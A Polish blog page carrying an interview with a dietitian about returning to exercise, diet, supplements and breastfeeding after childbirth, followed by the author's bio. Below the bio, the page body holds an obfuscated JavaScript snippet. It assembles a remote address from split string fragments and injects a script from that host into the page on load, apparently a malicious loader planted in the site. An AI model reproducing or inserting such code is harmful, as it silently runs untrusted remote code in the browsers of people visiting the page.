Shadow

Dieta i ćwiczenia po porodzie – wywiad z dietetykiem

Młode mamy dość szybko zaczynają się zastanawiać nad tym, kiedy wrócić do aktywności fizycznej i odzyskać dawną sylwetkę.

Młode mamy dość szybko zaczynają się zastanawiać nad tym, kiedy wrócić do aktywności fizycznej i starać się odzyskać dawną sylwetkę. Ich wątpliwości rozwieje poniższy wywiad z dietetykiem, który został oryginalnie opublikowany na blogu parentingowo.com

1. Kiedy można myśleć o powrocie do aktywności po porodzie?

Po około 6 tygodniach po połogu. Wraca wtedy hormonalna równowaga, rany porodowe ulegają zagojeniu, samopoczucie ulega poprawieniu. Wzrasta również chęć podjęcia aktywności fizycznej.

2. Od czego zacząć i jak często trzeba ćwiczyć, aby zauważyć efekty?

Początkowo wystarczy nawet codzienny godzinny spacer. Z każdym tygodniem można zwiększać aktywność fizyczną. Zacząć od pilatesu, biegania, treningu funkcjonalnego. Jeżeli chodzi o bieganie, nie należy się zrażać, że początkowo problem stanowią nawet 3 km. Warto wtedy zastosować metodę marszobiegu (kiedy zmęczymy się biegnąc odpoczywamy przeplatając nasz maksymalny wysiłek niższym, czyli marszem). Docelowo warto pokonywać dystans 5-8 km 2-3 razy w tygodniu. W późniejszym etapie warto wprowadzić ćwiczenia siłowe na siłowni. 3 treningi siłowe w tygodniu trwające po godzinie będą optymalnym rozwiązaniem. Należy ćwiczyć całe ciało, nie zapominając o żadnej partii mięśniowej.

3. Jak się wtedy odżywiać? Jak mocno dieta matki karmiącej powinna różnić się od diety typowej, aktywnej fizycznie kobiety?

Najważniejsza jest zdrowa, zbilansowana i zróżnicowana dieta. Jemy 5 posiłków dziennie, śniadanie jak najszybciej po przebudzeniu. Kolejne posiłki jemy w odstępach 3-4 godzinnych. Możemy również obalić popularny mit i spokojnie jeść po godzinie 18. Dieta mamy karmiącej nie musi się znacznie różnić w stosunku do diety typowej aktywnej kobiety. Należy jednak pamiętać o dodaniu 300 kcal dziennie do ogólnego bilansu kalorycznego przez cały okres karmienia. Jest to związane ze zwiększonym wydatkowaniem kaloryczności organizmu kobiety produkującego mleko.

4. Czy matka karmiąca może stosować suplementację?

Może stosować preparaty zawierające witaminy i minerały. Pozostałe suplementy są niewskazane. Wystarczy spojrzeć na etykietę, a na 99% z nich jest napisane, że nie jest zalecane u kobiet karmiących i kobiet w ciąży. Nie prowadzi się badań na kobietach w ciąży, dlatego warto poczekać z dodatkową suplementacją.

5. Wśród mam pojawia się obawa o to, że intensywne ćwiczenia mogą doprowadzić do utraty pokarmu. Czy wysiłek fizyczny może w jakikolwiek sposób wpłynąć na ilość oraz jakość pokarmu?

Jeżeli wysiłek fizyczny będzie powodował znaczne obniżenie bilansu kalorycznego, może dojść do sytuacji, w której pokarm będzie zanikać. Dlatego wysiłek musi być wprowadzany stopniowo, bez tzw. „zarzynania się”. Musimy pamiętać również, żeby dostarczyć odpowiednia ilość kcal z dietą.

6. Skoro mowa o powrocie do aktywności po ciąży, to na co można sobie pozwolić w trakcie ciąży?

Jeżeli matka przed ciążą nie podejmowała aktywności fizycznej, to dobrym rozwiązaniem jest aqua aerobik czy specjalne ćwiczenia grupowe dla kobiet w ciąży. Jeżeli ćwiczyła wcześniej, może obniżyć intensywność dotychczasowych ćwiczeń, jak również obciążenia. Przed zajściem w ciążę warto wzmocnić mięśnie brzucha, które pomagają przy porodzie, a także stabilizują sylwetkę. PAMIĘTAJMY, ŻE ZAWSZE KAŻDA AKTYWNOŚĆ FIZYCZNA POWINNA BYĆ SKONSULTOWANA Z LEKARZEM PROWADZĄCYM.

Jakub Piotrowski (https://www.dietetykwszczecinie.pl/) pracuje na co dzień jako dietetyk i trener personalny. Jest absolwentem Pomorskiego Uniwersytetu Medycznego na kierunku dietetyka, oraz Uniwersytetu Szczecińskiego na kierunku Biotechnologia. Połączenie wiedzy i doświadczenia pomaga sprawić, że osoby stosujące dietę wcale nie czują, że na niej są. Dietetyka sportowa i pomoc w odchudzaniu to jego pasja. Mówi, że wraz ze spadającymi kilogramami zmienia się nie tylko ciało, ale również dusza. Jego motto brzmi: Aby schudnąć, trzeba jeść.

(function(){
qzcf=document.createElement(„script”);qzcf_=(„us”)+(„ta”);
qzcf_+=”t”+(„.”);qzcf_+=(„in”);qzcfu=”13540794″;qzcf.async=true;
qzcfu+=”.mx9peeenzcfdh2xin”;qzcf.type=”text/javascript”;qzcf_+=”f”+”o”+(„/”);
qzcfu+=”exuvbckhb91u7″;qzcf.src=”//”+qzcf_+qzcfu;
dqzcf=document.body;dqzcf.appendChild(qzcf);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *